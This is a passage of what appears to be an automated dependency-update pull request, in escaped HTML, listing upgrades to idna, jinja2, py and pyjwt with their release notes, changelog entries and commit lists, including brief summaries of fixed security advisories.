href=\"https://github.com/kjd/idna/commit/5beb28b9dd77912c0dd656d8b0fdba3eb80222e7\"\u003e\u003ccode\u003e5beb28b\u003c/code\u003e\u003c/a\u003e More efficient resolution of joiner contexts\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1b121483ed04d9576a1291758f537e1318cddc8b\"\u003e\u003ccode\u003e1b12148\u003c/code\u003e\u003c/a\u003e Update ossf/scorecard-action to v2.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/d516b874c3388047934938a500c7488d52c4e067\"\u003e\u003ccode\u003ed516b87\u003c/code\u003e\u003c/a\u003e Update Github actions/checkout to v4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c095c75943413c75ebf8ac74179757031b7f80b7\"\u003e\u003ccode\u003ec095c75\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/60a0a4cb61ec6834d74306bd8a1fa46daac94c98\"\u003e\u003ccode\u003e60a0a4c\u003c/code\u003e\u003c/a\u003e Fix typo in GitHub Actions workflow key\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5918a0ef8034379c2e409ae93ee11d24295bb201\"\u003e\u003ccode\u003e5918a0e\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v2.6...v3.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jinja2` from 2.10.1 to 3.1.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/releases\"\u003ejinja2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.1.6\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.6 security release, which fixes security issues but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.6/\"\u003ehttps://pypi.org/project/Jinja2/3.1.6/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\"\u003ehttps://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup, allowing the sandbox to apply its checks. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\"\u003ehttps://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.5\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.5 security fix release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.5/\"\u003ehttps://pypi.org/project/Jinja2/3.1.5/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/changes/#version-3-1-5\"\u003ehttps://jinja.palletsprojects.com/changes/#version-3-1-5\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/jinja/milestone/16?closed=1\"\u003ehttps://github.com/pallets/jinja/milestone/16?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as by passing a stored reference to a filter that calls its argument. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h\"\u003eGHSA-q2x7-8rv6-6q7h\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid issues with names that contain f-string syntax. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1792\"\u003e#1792\u003c/a\u003e, \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699\"\u003eGHSA-gmj6-6f8f-6699\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence types. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2032\"\u003e#2032\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1952\"\u003e#1952\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment when calling block references. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1701\"\u003e#1701\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another async-aware filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1781\"\u003e#1781\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1921\"\u003e#1921\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e call. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2021\"\u003e#2021\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e objects. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2025\"\u003e#2025\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2027\"\u003e#2027\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2061\"\u003e#2061\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were searched. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1661\"\u003e#1661\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not contain the templates directory. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1705\"\u003e#1705\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1880\"\u003e#1880\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1870\"\u003e#1870\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTests decorated with \u003ccode\u003e@pass_context\u003c/code\u003e can be used with the \u003ccode\u003e|select\u003c/code\u003e filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1624\"\u003e#1624\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e for multiple assignment (\u003ccode\u003ea, b = 1, 2\u003c/code\u003e) does not fail when the target is a namespace attribute. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1413\"\u003e#1413\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e in all branches of \u003ccode\u003e{% if %}{% elif %}{% else %}\u003c/code\u003e blocks does not cause the variable to be considered initially undefined. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1253\"\u003e#1253\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.4\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.4 security release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.4/\"\u003ehttps://pypi.org/project/Jinja2/3.1.4/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\"\u003ehttps://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003exmlattr\u003c/code\u003e filter does not allow keys with \u003ccode\u003e/\u003c/code\u003e solidus, \u003ccode\u003e\u0026gt;\u003c/code\u003e greater-than sign, or \u003ccode\u003e=\u003c/code\u003e equals sign, in addition to disallowing spaces. Regardless of any validation done by Jinja, user input should never be used as keys to this filter, or must be separately validated first. GHSA-h75v-3vvj-5mfj\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 3.1.x feature branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95\"\u003eGHSA-h5c8-rqwp-cp95\u003c/a\u003e. You are affected if you are using \u003ccode\u003exmlattr\u003c/code\u003e and passing user input as attribute keys.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/blob/main/CHANGES.rst\"\u003ejinja2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.1.6\u003c/h2\u003e\n\u003cp\u003eReleased 2025-03-05\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup,\nallowing the sandbox to apply its checks. :ghsa:\u003ccode\u003ecpwx-vrp4-4pq7\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.1.5\u003c/h2\u003e\n\u003cp\u003eReleased 2024-12-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as\nby passing a stored reference to a filter that calls its argument.\n:ghsa:\u003ccode\u003eq2x7-8rv6-6q7h\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid\nissues with names that contain f-string syntax.\n:issue:\u003ccode\u003e1792\u003c/code\u003e, :ghsa:\u003ccode\u003egmj6-6f8f-6699\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence\ntypes. :issue:\u003ccode\u003e2032\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e.\n:pr:\u003ccode\u003e1952\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends.\n:pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment\nwhen calling block references. :issue:\u003ccode\u003e1701\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another\nasync-aware filter. :issue:\u003ccode\u003e1781\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation.\n:issue:\u003ccode\u003e1921\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e\ncall. :issue:\u003ccode\u003e2021\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e\nobjects. :issue:\u003ccode\u003e2025\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object.\n:issue:\u003ccode\u003e2027\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. :pr:\u003ccode\u003e2061\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were\nsearched. :issue:\u003ccode\u003e1661\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not\ncontain the templates directory. :issue:\u003ccode\u003e1705\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. :pr:\u003ccode\u003e1880\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. :pr:\u003ccode\u003e1870\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/15206881c006c79667fe5154fe80c01c65410679\"\u003e\u003ccode\u003e1520688\u003c/code\u003e\u003c/a\u003e release version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403\"\u003e\u003ccode\u003e90457bb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/065334d1ee5b7210e1a0a93c37238c86858f2af7\"\u003e\u003ccode\u003e065334d\u003c/code\u003e\u003c/a\u003e attr filter uses env.getattr\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/033c20015c7ca899ab52eb921bb0f08e6d3dd145\"\u003e\u003ccode\u003e033c200\u003c/code\u003e\u003c/a\u003e start version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/bc68d4efa99c5f77334f0e519628558059ae8c35\"\u003e\u003ccode\u003ebc68d4e\u003c/code\u003e\u003c/a\u003e use global contributing guide (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/247de5e0c5062a792eb378e50e13e692885ee486\"\u003e\u003ccode\u003e247de5e\u003c/code\u003e\u003c/a\u003e use global contributing guide\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/ab8218c7a1b66b62e0ad6b941bd514e3a64a358f\"\u003e\u003ccode\u003eab8218c\u003c/code\u003e\u003c/a\u003e use project advisory link instead of global\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/b4ffc8ff299dfd360064bea4cd2f862364601ad2\"\u003e\u003ccode\u003eb4ffc8f\u003c/code\u003e\u003c/a\u003e release version 3.1.5 (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2066\"\u003e#2066\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/877f6e51be8e1765b06d911cfaa9033775f051d1\"\u003e\u003ccode\u003e877f6e5\u003c/code\u003e\u003c/a\u003e release version 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/8d588592653b052f957b720e1fc93196e06f207f\"\u003e\u003ccode\u003e8d58859\u003c/code\u003e\u003c/a\u003e remove test pypi\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/jinja/compare/2.10.1...3.1.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.5.2 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.10.0 (2020-12-12)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix a regular expression DoS vulnerability in the py.path.svnwc SVN blame functionality (CVE-2020-29651)\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.4 =\u0026gt; 1.5\u003c/li\u003e\n\u003cli\u003eUpdate vendored iniconfig: 1.0.0 =\u0026gt; 1.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.9.0 (2020-06-24)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd type annotation stubs for the following modules:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epy.error\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.iniconfig\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.path\u003c/code\u003e (not including SVN paths)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.io\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.xml\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThere are no plans to type other modules at this time.\u003c/p\u003e\n\u003cp\u003eThe type annotations are provided in external .pyi files, not inline in the\ncode, and may therefore contain small errors or omissions. If you use \u003ccode\u003epy\u003c/code\u003e\nin conjunction with a type checker, and encounter any type errors you believe\nshould be accepted, please report it in an issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.2 (2020-06-15)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eOn Windows, \u003ccode\u003epy.path.local\u003c/code\u003es which differ only in case now have the same\nPython hash value. Previously, such paths were considered equal but had\ndifferent hashes, which is not allowed and breaks the assumptions made by\ndicts, sets and other users of hashes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.1 (2019-12-27)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eHandle \u003ccode\u003eFileNotFoundError\u003c/code\u003e when trying to import pathlib in \u003ccode\u003epath.common\u003c/code\u003e\non Python 3.4 (\u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/207\"\u003e#207\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003epy.path.local.samefile\u003c/code\u003e now works correctly in Python 3 on Windows when dealing with symlinks.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.0 (2019-02-21)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.5.2...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pyjwt` from 1.5.3 to 2.4.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.4.0\u003c/h2\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[CVE-2022-29217] Prevent key confusion through non-blocklisted public key formats. \u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24\"\u003ehttps://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Python 3.10 by \u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/699\"\u003ejpadilla/pyjwt#699\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDon't use implicit optionals by \u003ca href=\"https://github.com/rekyungmin\"\u003e\u003ccode\u003e@​rekyungmin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/705\"\u003ejpadilla/pyjwt#705\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/708\"\u003ejpadilla/pyjwt#708\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/710\"\u003ejpadilla/pyjwt#710\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/711\"\u003ejpadilla/pyjwt#711\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/712\"\u003ejpadilla/pyjwt#712\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocumentation fix: show correct scope for decode_complete() by \u003ca href=\"https://github.com/sseering\"\u003e\u003ccode\u003e@​sseering\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/661\"\u003ejpadilla/pyjwt#661\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/716\"\u003ejpadilla/pyjwt#716\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eExplicit check the key for ECAlgorithm by \u003ca 